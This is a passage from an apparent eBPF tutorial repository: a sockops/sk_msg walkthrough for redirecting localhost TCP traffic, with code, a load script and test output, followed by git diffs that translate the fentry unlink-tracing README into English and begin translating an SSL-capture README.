programs can be used to accelerate local request forwarding, providing functionality similar to direct memory access (DMA). Sockops programs can manage sockets in the kernel space and directly forward packets between sockets on the local machine, reducing the CPU time required for packet forwarding in the TCP/IP stack. - -This tutorial will demonstrate how to use sockops-type eBPF programs to accelerate network request forwarding through a specific example. 
To help you understand how to use sockops programs, we will step by step introduce the code of the example program and discuss the working principle of each part. The complete source code and project can be found at . - -## Leveraging eBPF Sockops for Performance Optimization - -Network connections are essentially communication between sockets, and eBPF provides a `bpf_msg_redirect_hash` function that allows packets sent by an application to be directly forwarded to the corresponding socket on the recipient side, greatly accelerating the packet processing flow in the kernel. - -Here, the `sock_map` is a key component that stores socket rules, i.e., it selects an existing socket connection from the `sock_map` based on the current packet information. Therefore, it is necessary to save the socket information to the `sock_map` at the hook of the sockops or elsewhere and provide a rule (usually a four-tuple) to find the socket based on the key. - -The Merbridge project has achieved acceleration for Istio by replacing iptables with eBPF. After using Merbridge (eBPF) optimization, the inbound and outbound traffic bypasses many kernel modules, significantly improving performance, as shown in the following diagram: - -![merbridge](merbridge.png) - -## Example Program - -This example program redirects traffic from the sender’s socket (outgoing) to the recipient’s socket (incoming), bypassing the TCP/IP kernel network stack. In this example, we assume that the sender and recipient are both running on the **same** machine. This example program has two parts that share a map definition: - -bpf_sockmap.h - -```c -#include "vmlinux.h" -#include -#include - -#define LOCALHOST_IPV4 16777343 - -struct sock_key { - __u32 sip; - __u32 dip; - __u32 sport; - __u32 dport; - __u32 family; -}; - -struct { - __uint(type, BPF_MAP_TYPE_SOCKHASH); - __uint(max_entries, 65535); - __type(key, struct sock_key); - __type(value, int); -} sock_ops_map SEC(".maps"); -``` - -The BPF program in this example is divided into two parts: `bpf_redirect.bpf.c` and `bpf_contrack.bpf.c`. - -- The BPF code in `bpf_contrack.bpf.c` defines a socket operation (`sockops`) program, whose main function is to create an entry in the `sock_ops_map` BPF map in which it stores the five-tuple (source address, destination address, source port, destination port, protocol) for each new TCP connection established on the local machine (using localhost). This BPF map is defined as type `BPF_MAP_TYPE_SOCKHASH` and can store sockets and their corresponding five-tuple. This allows the five-tuple information of each local TCP connection to be found in the BPF map whenever the connection is created. - -- The BPF code in `bpf_redirect.bpf.c` defines a sk_msg handler that is called when a message arrives on a local socket. The sk_msg program checks if the message is from a local address, and if so, it retrieves the five-tuple (source address, destination address, source port, destination port, protocol) from the message and looks up the corresponding socket in the `sock_ops_map` using the obtained key. Then, it redirects the message to the socket found in the `sock_ops_map`, thus bypassing the kernel network stack and directly delivering the message from the sender's socket to the receiver's socket. - -For example, let's assume that there are two processes running locally, process A binds to port 8000, and process B binds to port 9000. Process A sends a message to process B. - -1. 
When the TCP connection is first established between process A and process B, the `sockops` program in `bpf_contrack.bpf.c` is triggered, and it creates an entry in the `sock_ops_map` BPF map for the five-tuple `{127.0.0.1, 127.0.0.1, 8000, 9000, TCP}`, with the value being the socket of process A. - -2. When process A sends a message, the `sk_msg` program in `bpf_redirect.bpf.c` is triggered, and it redirects the message from process A's socket to the socket stored in the `sock_ops_map` based on the obtained five-tuple information (source address, destination address, source port, destination port, protocol). As a result, the message is directly delivered from process A to process B, bypassing the kernel network stack. - -This example program uses BPF to efficiently redirect messages from the sender's socket to the recipient's socket during local communication, bypassing the kernel network stack to improve transmission efficiency. - -bpf_redirect.bpf.c - -```c -#include "bpf_sockmap.h" - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; - -SEC("sk_msg") -int bpf_redir(struct sk_msg_md *msg) -{ - if(msg->remote_ip4 != LOCALHOST_IPV4 || msg->local_ip4!= LOCALHOST_IPV4) - return SK_PASS; - - struct sock_key key = { - .sip = msg->remote_ip4, - .dip = msg->local_ip4, - .dport = bpf_htonl(msg->local_port), /* convert to network byte order */ - .sport = msg->remote_port, - .family = msg->family, - }; - return bpf_msg_redirect_hash(msg, &sock_ops_map, &key, BPF_F_INGRESS); -} -``` - -bpf_contrack.bpf.c - -```c -#include "bpf_sockmap.h" - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; - -SEC("sockops") -int bpf_sockops_handler(struct bpf_sock_ops *skops){ - u32 family, op; - - family = skops->family; - op = skops->op; - if (op != BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB - && op != BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB) { - return BPF_OK; - } - - if(skops->remote_ip4 != LOCALHOST_IPV4 || skops->local_ip4!= LOCALHOST_IPV4) { - return BPF_OK; - } - - struct sock_key key = { - .dip = skops->remote_ip4, - .sip = skops->local_ip4, - .sport = bpf_htonl(skops->local_port), /* convert to network byte order */ - .dport = skops->remote_port, - .family = skops->family, - }; - - bpf_printk(">>> new connection: OP:%d, PORT:%d --> %d\n", op, bpf_ntohl(key.sport), bpf_ntohl(key.dport)); - - bpf_sock_hash_update(skops, &sock_ops_map, &key, BPF_NOEXIST); - return BPF_OK; -} -``` - -### Compiling the eBPF Program - -Here, we use libbpf to compile the eBPF program. The complete source code and project can be found at . - -```shell -# Compile the bpf program with libbpf -make -``` - -### Loading the eBPF Program - -We have created a script to load the eBPF program, which will automatically load both eBPF programs and create a BPF map: - -```shell -sudo ./load.sh -``` - -This script actually performs the following operations: - -```sh -#!/bin/bash -set -x -set -e - -sudo mount -t bpf bpf /sys/fs/bpf/ - -# check if old program already loaded -if [ -e "/sys/fs/bpf/bpf_sockops" ]; then - echo ">>> bpf_sockops already loaded, uninstalling..." - ./unload.sh - echo ">>> old program already deleted..." 
-fi - -# load and attach sock_ops program -sudo bpftool prog load bpf_contrack.bpf.o /sys/fs/bpf/bpf_sockops type sockops pinmaps /sys/fs/bpf/ -sudo bpftool cgroup attach "/sys/fs/cgroup/" sock_ops pinned "/sys/fs/bpf/bpf_sockops" - -# load and attach sk_msg program -sudo bpftool prog load bpf_redirect.bpf.o "/sys/fs/bpf/bpf_redir" map name sock_ops_map pinned "/sys/fs/bpf/sock_ops_map" -sudo bpftool prog attach pinned /sys/fs/bpf/bpf_redir msg_verdict pinned /sys/fs/bpf/sock_ops_map -``` - -This is a script for loading BPF programs. Its main function is to load and attach BPF programs to the kernel system, and store the associated BPF maps in the BPF file system so that the BPF programs can access and operate on these maps. - -Let's take a detailed look at what each line of the script does. - -1. `sudo mount -t bpf bpf /sys/fs/bpf/` mounts the BPF file system, enabling access to and operation on BPF programs and related maps by the system. -2. The condition check `[ -e "/sys/fs/bpf/bpf_sockops" ]` checks whether the `/sys/fs/bpf/bpf_sockops` file already exists. If it does exist, it means that the `bpf_sockops` program has already been loaded into the system, so it will be uninstalled using the `./unload.sh` script. -3. `sudo bpftool prog load bpf_contrack.bpf.o /sys/fs/bpf/bpf_sockops type sockops pinmaps /sys/fs/bpf/` loads the BPF object file `bpf_contrack.bpf.o` compiled from the `bpf_contrack.bpf.c` into the BPF file system, storing it in `/sys/fs/bpf/bpf_sockops`, and specifying its type as `sockops`. `pinmaps /sys/fs/bpf/` specifies that the BPF maps associated with the loaded BPF program will be stored under `/sys/fs/bpf/`. -4. `sudo bpftool cgroup attach "/sys/fs/cgroup/" sock_ops pinned "/sys/fs/bpf/bpf_sockops"` attaches the `bpf_sockops` program that has been loaded into the BPF file system to the cgroup (the path is `"/sys/fs/cgroup/"`). After the attachment, all socket operations belonging to this cgroup will be affected by the `bpf_sockops` program. -5. `sudo bpftool prog load bpf_redirect.bpf.o "/sys/fs/bpf/bpf_redir" map name sock_ops_map pinned "/sys/fs/bpf/sock_ops_map"` loads the BPF object file `bpf_redirect.bpf.o` compiled from `bpf_redirect.bpf.c` into the BPF file system, storing it in `/sys/fs/bpf/bpf_redir`, and specifying the associated map as `sock_ops_map`, which is located in `/sys/fs/bpf/sock_ops_map`. -6. `sudo bpftool prog attach pinned /sys/fs/bpf/bpf_redir msg_verdict pinned /sys/fs/bpf/sock_ops_map` attaches the already loaded `bpf_redir` program to the `sock_ops_map` using the `msg_verdict` attachment type, which means that when the socket associated with this map receives a message, the `bpf_redir` program will be called to handle it. - -In summary, the main function of this script is to load the two BPF programs used to process local socket traffic into the system and attach them to the correct locations so that they can be correctly called, ensuring that they can access and manipulate the associated BPF maps. - -You can use the [bpftool utility](https://github.com/torvalds/linux/blob/master/tools/bpf/bpftool/Documentation/bpftool-prog.rst) to check if these two eBPF programs have been loaded. 
- -```console -$ sudo bpftool prog show -63: sock_ops name bpf_sockmap tag 275467be1d69253d gpl - loaded_at 2019-01-24T13:07:17+0200 uid 0 - xlated 1232B jited 750B memlock 4096B map_ids 58 -64: sk_msg name bpf_redir tag bc78074aa9dd96f4 gpl - loaded_at 2019-01-24T13:07:17+0200 uid 0 - xlated 304B jited 233B memlock 4096B map_ids 58 -``` - -### Test with iperf3 or curl - -See to install iperf3. - -Running the iperf3 Server: - -```shell -iperf3 -s -p 5001 -``` - -Running the iperf3 Client: - -```shell -iperf3 -c 127.0.0.1 -t 10 -l 64k -p 5001 -``` - -Or you can use curl and python: - -```sh -python3 -m http.server -curl http://0.0.0.0:8000/ -``` - -### Collecting Traces - -Check the `sock_ops` trace for local connection establishments. - -```console -$ ./trace_bpf_output.sh # which is basically sudo cat /sys/kernel/debug/tracing/trace_pipe -iperf3-9516 [001] .... 22500.634108: 0: <<< ipv4 op = 4, port 18583 --> 4135 -iperf3-9516 [001] ..s1 22500.634137: 0: <<< ipv4 op = 5, port 4135 --> 18583 -iperf3-9516 [001] .... 22500.634523: 0: <<< ipv4 op = 4, port 19095 --> 4135 -iperf3-9516 [001] ..s1 22500.634536: 0: <<< ipv4 op = 5, port 4135 --> 19095 -``` - -When the connection is established between `iperf3 -c` and the server, you should see the events above for socket establishment. If you don't see any events, then the eBPF programs may not have been attached correctly. - -Furthermore, when `sk_msg` takes effect, you should observe that when capturing local traffic on the loopback interface using tcpdump, only the three-way handshake and four-way termination traffic are captured, and the actual data flow of iperf is not captured. If the iperf data flow is captured, then the eBPF programs may not have been attached correctly. - -```console -$ ./trace_lo_traffic.sh # tcpdump -i lo port 5001 - -# Three-way handshake -13:24:07.181804 IP localhost.46506 > localhost.5001: Flags [S], seq 620239881, win 65495, options [mss 65495,sackOK,TS val 1982813394 ecr 0,nop,wscale 7], length 0 -13:24:07.181815 IP localhost.5001 > localhost.46506: Flags [S.], seq 1084484879, ack 620239882, win 65483, options [mss 65495,sackOK,TS val 1982813394 ecr 1982813394,nop,wscale 7], length 0 -13:24:07.181832 IP localhost.46506 > localhost.5001: Flags [.], ack 1, win 512, options [nop,nop,TS val 1982813394 ecr 1982813394], length 0 - -# Four-way termination -13:24:12.475649 IP localhost.46506 > localhost.5001: Flags [F.], seq 1, ack 1, win 512, options [nop,nop,TS val 1982818688 ecr 1982813394], length 0 -13:24:12.479621 IP localhost.5001 > localhost.46506: Flags [.], ack 2, win 512, options [nop,nop,TS val 1982818692 ecr 1982818688], length 0 -13:24:12.481265 IP localhost.5001 > localhost.46506: Flags [F.], seq 1, ack 2, win 512, options [nop,nop,TS val 1982818694 ecr 1982818688], length 0 -13:24:12.481270 IP localhost.46506 > localhost.5001: Flags [.], ack 2, win 512, options [nop,nop,TS val 1982818694 ecr 1982818694], length 0 -``` - -### Unloading the eBPF Program - -```shell -sudo ./unload.sh -``` - -## References - -Finally, if you are interested in eBPF technology and want to learn more and practice further, you can visit our tutorial code repository at and the tutorial website at . 
- -- -- - -> The original link of this article: diff --git a/src/3-fentry-unlink/README.md b/src/3-fentry-unlink/README.md index 3efd30a..015f9ae 100644 --- a/src/3-fentry-unlink/README.md +++ b/src/3-fentry-unlink/README.md @@ -1,14 +1,14 @@ -# eBPF 入门开发实践教程三:在 eBPF 中使用 fentry 监测捕获 unlink 系统调用 +# eBPF Tutorial by Example 3: Monitoring unlink System Calls with fentry -eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and execute user-defined code at runtime in the kernel. -本文是 eBPF 入门开发实践教程的第三篇,在 eBPF 中使用 fentry 捕获 unlink 系统调用。 +This article is the third part of the eBPF Tutorial by Example, focusing on capturing unlink system calls using fentry in eBPF. ## Fentry -fentry(function entry)和 fexit(function exit)是 eBPF(扩展的伯克利包过滤器)中的两种探针类型,用于在 Linux 内核函数的入口和退出处进行跟踪。它们允许开发者在内核函数执行的特定阶段收集信息、修改参数或观察返回值。这种跟踪和监控功能在性能分析、故障排查和安全分析等场景中非常有用。 +fentry (function entry) and fexit (function exit) are two types of probes in eBPF (Extended Berkeley Packet Filter) used for tracing at the entry and exit points of Linux kernel functions. They allow developers to collect information, modify parameters, or observe return values at specific stages of kernel function execution. This tracing and monitoring functionality is very useful in performance analysis, troubleshooting, and security analysis scenarios. -与 kprobes 相比,fentry 和 fexit 程序有更高的性能和可用性。在这个例子中,我们可以直接访问函数的指针参数,就像在普通的 C 代码中一样,而不需要使用各种读取帮助程序。fexit 和 kretprobe 程序最大的区别在于,fexit 程序可以访问函数的输入参数和返回值,而 kretprobe 只能访问返回值。从 5.5 内核开始,fentry 和 fexit 对 eBPF 程序可用。 +Compared to kprobes, fentry and fexit programs have higher performance and availability. In this example, we can directly access the pointers to the functions' parameters, just like in regular C code, without needing various read helpers. The main difference between fexit and kretprobe programs is that fexit programs can access both the input parameters and return values of a function, while kretprobe programs can only access the return value. Starting from the 5.5 kernel, fentry and fexit are available for eBPF programs. ```c #include "vmlinux.h" @@ -38,30 +38,28 @@ int BPF_PROG(do_unlinkat_exit, int dfd, struct filename *name, long ret) } ``` -这段程序是用 C 语言编写的 eBPF(扩展的伯克利包过滤器)程序,它使用 BPF 的 fentry 和 fexit 探针来跟踪 Linux 内核函数 `do_unlinkat`。在这个教程中,我们将以这段程序作为示例,让您学会如何在 eBPF 中使用 fentry 监测捕获 unlink 系统调用。 +This program is an eBPF (Extended Berkeley Packet Filter) program written in the C language. It uses BPF fentry and fexit probes to trace the Linux kernel function `do_unlinkat`. In this tutorial, we will use this program as an example to learn how to use fentry in eBPF to detect and capture unlink system calls. -程序包含以下部分: +The program consists of the following parts: -1. 包含头文件:包括 vmlinux.h(用于访问内核数据结构)、bpf/bpf_helpers.h(包含eBPF帮助函数)、bpf/bpf_tracing.h(用于eBPF跟踪相关功能)。 -2. 定义许可证:这里定义了一个名为 `LICENSE` 的字符数组,包含许可证信息“Dual BSD/GPL”。 -3. 定义 fentry 探针:我们定义了一个名为 `BPF_PROG(do_unlinkat)` 的 fentry 探针,该探针在 `do_unlinkat` 函数的入口处被触发。这个探针获取当前进程的 PID(进程ID)并将其与文件名一起打印到内核日志。 -4. 定义 fexit 探针:我们还定义了一个名为 `BPF_PROG(do_unlinkat_exit)` 的 fexit 探针,该探针在 `do_unlinkat` 函数的退出处被触发。与 fentry 探针类似,这个探针也会获取当前进程的 PID 并将其与文件名和返回值一起打印到内核日志。 +1. Include header files: including vmlinux.h (for accessing kernel data structures), bpf/bpf_helpers.h (which includes eBPF helper functions), bpf/bpf_tracing.h (for eBPF tracing-related functionalities). +2. 
Define license: Here, a character array named `LICENSE` is defined, containing the license information "Dual BSD/GPL".
+3. Define fentry probe: We define an fentry probe named `BPF_PROG(do_unlinkat)` that is triggered at the entry point of the `do_unlinkat` function. This probe retrieves the PID (Process ID) of the current process and prints it along with the filename to the kernel log.
+4. Define fexit probe: We also define an fexit probe named `BPF_PROG(do_unlinkat_exit)` that is triggered at the exit point of the `do_unlinkat` function. Similar to the fentry probe, this probe also retrieves the PID of the current process and prints it along with the filename and return value to the kernel log.

-通过这个示例,您可以学习如何在 eBPF 中使用 fentry 和 fexit 探针来监控和捕获内核函数调用,例如在本教程中的 unlink 系统调用。
+Through this example, you can learn how to use fentry and fexit probes in eBPF to monitor and capture kernel function calls, such as the unlink system call in this tutorial.

-eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。
+eunomia-bpf is an open source eBPF dynamic loading runtime and development toolchain combined with Wasm. Its goal is to simplify the development, building, distribution, and running of eBPF programs. You can refer to [here](https://github.com/eunomia-bpf/eunomia-bpf) to download and install the ecc compilation toolchain and ecli runtime. We use eunomia-bpf to compile and run this example.

-编译运行上述代码:
+To compile and run the above code:

```console
$ ecc fentry-link.bpf.c
Compiling bpf object...
Packing ebpf object and config into package.json...
$ sudo ecli run package.json
-Runing eBPF program...
+Running eBPF program...
```

-在另外一个窗口中:
+In another window:

```shell
touch test_file
@@ -70,7 +68,7 @@ touch test_file2
rm test_file2
```

-运行这段程序后,可以通过查看 `/sys/kernel/debug/tracing/trace_pipe` 文件来查看 eBPF 程序的输出:
+After running this program, you can view the output of the eBPF program by examining the `/sys/kernel/debug/tracing/trace_pipe` file:

```console
$ sudo cat /sys/kernel/debug/tracing/trace_pipe
@@ -80,10 +78,10 @@ $ sudo cat /sys/kernel/debug/tracing/trace_pipe
 rm-9290 [004] d..2 4637.798843: bpf_trace_printk: fexit: pid = 9290, filename = test_file2, ret = 0
```

-## 总结
+## Summary

-这段程序是一个 eBPF 程序,通过使用 fentry 和 fexit 捕获 `do_unlinkat` 和 `do_unlinkat_exit` 函数,并通过使用 `bpf_get_current_pid_tgid` 和 `bpf_printk` 函数获取调用 do_unlinkat 的进程的 ID、文件名和返回值,并在内核日志中打印出来。
+This eBPF program traces the entry and exit of the kernel function `do_unlinkat` using the fentry and fexit probes, and uses the `bpf_get_current_pid_tgid` and `bpf_printk` helpers to obtain the PID, filename, and return value of the process calling `do_unlinkat` and print them to the kernel log (a kprobe/kretprobe counterpart is sketched at the end of this article for comparison).

-编译这个程序可以使用 ecc 工具,运行时可以使用 ecli 命令,并通过查看 `/sys/kernel/debug/tracing/trace_pipe` 文件查看 eBPF 程序的输出。更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:
+To compile this program, use the ecc tool; to run it, use the ecli command; and view the output of the eBPF program by checking the `/sys/kernel/debug/tracing/trace_pipe` file. For more examples and a detailed development guide, please refer to the official documentation of eunomia-bpf.

-如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。
+If you'd like to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and complete tutorials.
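+
+As a companion to the fentry-versus-kprobe comparison earlier in this article, here is a minimal sketch (not part of the original example; program names are illustrative) of how the same `do_unlinkat` tracing would look with kprobe/kretprobe. Note how the kprobe needs the `BPF_CORE_READ` helper to dereference the kernel pointer `name->name`, and how the kretprobe only sees the return value; fentry/fexit remove exactly these limitations:
+
+```c
+#include "vmlinux.h"
+#include <bpf/bpf_helpers.h>
+#include <bpf/bpf_tracing.h>
+#include <bpf/bpf_core_read.h>
+
+char LICENSE[] SEC("license") = "Dual BSD/GPL";
+
+SEC("kprobe/do_unlinkat")
+int BPF_KPROBE(kprobe_do_unlinkat, int dfd, struct filename *name)
+{
+    pid_t pid = bpf_get_current_pid_tgid() >> 32;
+    /* kprobes cannot follow kernel pointers directly; a read helper is needed */
+    const char *filename = BPF_CORE_READ(name, name);
+    bpf_printk("kprobe: pid = %d, filename = %s\n", pid, filename);
+    return 0;
+}
+
+SEC("kretprobe/do_unlinkat")
+int BPF_KRETPROBE(kretprobe_do_unlinkat_exit, long ret)
+{
+    pid_t pid = bpf_get_current_pid_tgid() >> 32;
+    /* unlike fexit, the input arguments are no longer available here, only ret */
+    bpf_printk("kretprobe: pid = %d, ret = %ld\n", pid, ret);
+    return 0;
+}
+```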
diff --git a/src/3-fentry-unlink/README.zh.md b/src/3-fentry-unlink/README.zh.md new file mode 100644 index 0000000..3efd30a --- /dev/null +++ b/src/3-fentry-unlink/README.zh.md @@ -0,0 +1,89 @@ +# eBPF 入门开发实践教程三:在 eBPF 中使用 fentry 监测捕获 unlink 系统调用 + +eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 + +本文是 eBPF 入门开发实践教程的第三篇,在 eBPF 中使用 fentry 捕获 unlink 系统调用。 + +## Fentry + +fentry(function entry)和 fexit(function exit)是 eBPF(扩展的伯克利包过滤器)中的两种探针类型,用于在 Linux 内核函数的入口和退出处进行跟踪。它们允许开发者在内核函数执行的特定阶段收集信息、修改参数或观察返回值。这种跟踪和监控功能在性能分析、故障排查和安全分析等场景中非常有用。 + +与 kprobes 相比,fentry 和 fexit 程序有更高的性能和可用性。在这个例子中,我们可以直接访问函数的指针参数,就像在普通的 C 代码中一样,而不需要使用各种读取帮助程序。fexit 和 kretprobe 程序最大的区别在于,fexit 程序可以访问函数的输入参数和返回值,而 kretprobe 只能访问返回值。从 5.5 内核开始,fentry 和 fexit 对 eBPF 程序可用。 + +```c +#include "vmlinux.h" +#include +#include + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +SEC("fentry/do_unlinkat") +int BPF_PROG(do_unlinkat, int dfd, struct filename *name) +{ + pid_t pid; + + pid = bpf_get_current_pid_tgid() >> 32; + bpf_printk("fentry: pid = %d, filename = %s\n", pid, name->name); + return 0; +} + +SEC("fexit/do_unlinkat") +int BPF_PROG(do_unlinkat_exit, int dfd, struct filename *name, long ret) +{ + pid_t pid; + + pid = bpf_get_current_pid_tgid() >> 32; + bpf_printk("fexit: pid = %d, filename = %s, ret = %ld\n", pid, name->name, ret); + return 0; +} +``` + +这段程序是用 C 语言编写的 eBPF(扩展的伯克利包过滤器)程序,它使用 BPF 的 fentry 和 fexit 探针来跟踪 Linux 内核函数 `do_unlinkat`。在这个教程中,我们将以这段程序作为示例,让您学会如何在 eBPF 中使用 fentry 监测捕获 unlink 系统调用。 + +程序包含以下部分: + +1. 包含头文件:包括 vmlinux.h(用于访问内核数据结构)、bpf/bpf_helpers.h(包含eBPF帮助函数)、bpf/bpf_tracing.h(用于eBPF跟踪相关功能)。 +2. 定义许可证:这里定义了一个名为 `LICENSE` 的字符数组,包含许可证信息“Dual BSD/GPL”。 +3. 定义 fentry 探针:我们定义了一个名为 `BPF_PROG(do_unlinkat)` 的 fentry 探针,该探针在 `do_unlinkat` 函数的入口处被触发。这个探针获取当前进程的 PID(进程ID)并将其与文件名一起打印到内核日志。 +4. 定义 fexit 探针:我们还定义了一个名为 `BPF_PROG(do_unlinkat_exit)` 的 fexit 探针,该探针在 `do_unlinkat` 函数的退出处被触发。与 fentry 探针类似,这个探针也会获取当前进程的 PID 并将其与文件名和返回值一起打印到内核日志。 + +通过这个示例,您可以学习如何在 eBPF 中使用 fentry 和 fexit 探针来监控和捕获内核函数调用,例如在本教程中的 unlink 系统调用。 + +eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 + +编译运行上述代码: + +```console +$ ecc fentry-link.bpf.c +Compiling bpf object... +Packing ebpf object and config into package.json... +$ sudo ecli run package.json +Runing eBPF program... 
+``` + +在另外一个窗口中: + +```shell +touch test_file +rm test_file +touch test_file2 +rm test_file2 +``` + +运行这段程序后,可以通过查看 `/sys/kernel/debug/tracing/trace_pipe` 文件来查看 eBPF 程序的输出: + +```console +$ sudo cat /sys/kernel/debug/tracing/trace_pipe + rm-9290 [004] d..2 4637.798698: bpf_trace_printk: fentry: pid = 9290, filename = test_file + rm-9290 [004] d..2 4637.798843: bpf_trace_printk: fexit: pid = 9290, filename = test_file, ret = 0 + rm-9290 [004] d..2 4637.798698: bpf_trace_printk: fentry: pid = 9290, filename = test_file2 + rm-9290 [004] d..2 4637.798843: bpf_trace_printk: fexit: pid = 9290, filename = test_file2, ret = 0 +``` + +## 总结 + +这段程序是一个 eBPF 程序,通过使用 fentry 和 fexit 捕获 `do_unlinkat` 和 `do_unlinkat_exit` 函数,并通过使用 `bpf_get_current_pid_tgid` 和 `bpf_printk` 函数获取调用 do_unlinkat 的进程的 ID、文件名和返回值,并在内核日志中打印出来。 + +编译这个程序可以使用 ecc 工具,运行时可以使用 ecli 命令,并通过查看 `/sys/kernel/debug/tracing/trace_pipe` 文件查看 eBPF 程序的输出。更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档: + +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 diff --git a/src/3-fentry-unlink/README_en.md b/src/3-fentry-unlink/README_en.md deleted file mode 100644 index 015f9ae..0000000 --- a/src/3-fentry-unlink/README_en.md +++ /dev/null @@ -1,87 +0,0 @@ -# eBPF Tutorial by Example 3: Monitoring unlink System Calls with fentry - -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and execute user-defined code at runtime in the kernel. - -This article is the third part of the eBPF Tutorial by Example, focusing on capturing unlink system calls using fentry in eBPF. - -## Fentry - -fentry (function entry) and fexit (function exit) are two types of probes in eBPF (Extended Berkeley Packet Filter) used for tracing at the entry and exit points of Linux kernel functions. They allow developers to collect information, modify parameters, or observe return values at specific stages of kernel function execution. This tracing and monitoring functionality is very useful in performance analysis, troubleshooting, and security analysis scenarios. - -Compared to kprobes, fentry and fexit programs have higher performance and availability. In this example, we can directly access the pointers to the functions' parameters, just like in regular C code, without needing various read helpers. The main difference between fexit and kretprobe programs is that fexit programs can access both the input parameters and return values of a function, while kretprobe programs can only access the return value. Starting from the 5.5 kernel, fentry and fexit are available for eBPF programs. - -```c -#include "vmlinux.h" -#include -#include - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; - -SEC("fentry/do_unlinkat") -int BPF_PROG(do_unlinkat, int dfd, struct filename *name) -{ - pid_t pid; - - pid = bpf_get_current_pid_tgid() >> 32; - bpf_printk("fentry: pid = %d, filename = %s\n", pid, name->name); - return 0; -} - -SEC("fexit/do_unlinkat") -int BPF_PROG(do_unlinkat_exit, int dfd, struct filename *name, long ret) -{ - pid_t pid; - - pid = bpf_get_current_pid_tgid() >> 32; - bpf_printk("fexit: pid = %d, filename = %s, ret = %ld\n", pid, name->name, ret); - return 0; -} -``` - -This program is an eBPF (Extended Berkeley Packet Filter) program written in the C language. It uses BPF fentry and fexit probes to trace the Linux kernel function `do_unlinkat`. 
In this tutorial, we will use this program as an example to learn how to use fentry in eBPF to detect and capture unlink system calls. - -The program consists of the following parts: - -1. Include header files: including vmlinux.h (for accessing kernel data structures), bpf/bpf_helpers.h (which includes eBPF helper functions), bpf/bpf_tracing.h (for eBPF tracing-related functionalities). -2. Define license: Here, a character array named `LICENSE` is defined, containing the license information "Dual BSD/GPL". -3. Define fentry probe: We define an fentry probe named `BPF_PROG(do_unlinkat)` that is triggered at the entry point of the `do_unlinkat` function. This probe retrieves the PID (Process ID) of the current process and prints it along with the filename to the kernel log. -4. Define fexit probe: We also define an fexit probe named `BPF_PROG(do_unlinkat_exit)` that is triggered at the exit point of the `do_unlinkat` function. Similar to the fentry probe, this probe also retrieves the PID of the current process and prints it along with the filename and return value to the kernel log. - -Through this example, you can learn how to use fentry and fexit probes in eBPF to monitor and capture kernel function calls, such as the unlink system call in this tutorial. "eunomia-bpf is an open source eBPF dynamic loading runtime and development toolchain combined with Wasm. Its goal is to simplify the development, building, distribution, and running of eBPF programs. You can refer to [here](https://github.com/eunomia-bpf/eunomia-bpf) to download and install the ecc compilation toolchain and ecli runtime. We use eunomia-bpf to compile and run this example. - -To compile and run the above code: - -```console -$ ecc fentry-link.bpf.c -Compiling bpf object... -Packing ebpf object and config into package.json... -$ sudo ecli run package.json -Running eBPF program... -``` - -In another window: - -```shell -touch test_file -rm test_file -touch test_file2 -rm test_file2 -``` - -After running this program, you can view the output of the eBPF program by examining the `/sys/kernel/debug/tracing/trace_pipe` file: - -```console -$ sudo cat /sys/kernel/debug/tracing/trace_pipe - rm-9290 [004] d..2 4637.798698: bpf_trace_printk: fentry: pid = 9290, filename = test_file - rm-9290 [004] d..2 4637.798843: bpf_trace_printk: fexit: pid = 9290, filename = test_file, ret = 0 - rm-9290 [004] d..2 4637.798698: bpf_trace_printk: fentry: pid = 9290, filename = test_file2 - rm-9290 [004] d..2 4637.798843: bpf_trace_printk: fexit: pid = 9290, filename = test_file2, ret = 0 -``` - -## Summary - -This program is an eBPF program that captures the `do_unlinkat` and `do_unlinkat_exit` functions using fentry and fexit, and uses `bpf_get_current_pid_tgid` and `bpf_printk` functions to obtain the ID, filename, and return value of the process calling do_unlinkat, and print them in the kernel log. - -To compile this program, you can use the ecc tool, and to run it, you can use the ecli command, and view the output of the eBPF program by checking the `/sys/kernel/debug/tracing/trace_pipe` file. - -If you'd like to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and complete tutorials. 
diff --git a/src/30-sslsniff/README.md b/src/30-sslsniff/README.md
index aea36bb..c1b8dcf 100644
--- a/src/30-sslsniff/README.md
+++ b/src/30-sslsniff/README.md
@@ -1,115 +1,115 @@
-# eBPF 实践教程:使用 uprobe 捕获多种库的 SSL/TLS 明文数据
+# eBPF Practical Tutorial: Capturing SSL/TLS Plain Text Data Using uprobe

-随着TLS在现代网络环境中的广泛应用,跟踪微服务RPC消息已经变得愈加棘手。传统的流量嗅探技术常常受限于只能获取到加密后的数据,导致无法真正观察到通信的原始内容。这种限制为系统的调试和分析带来了不小的障碍。
+With the widespread use of TLS in modern network environments, tracing microservices RPC messages has become increasingly challenging. Traditional traffic sniffing techniques are often limited to capturing only the encrypted data, preventing genuine observation of the original communication content. This restriction poses significant obstacles to system debugging and analysis.

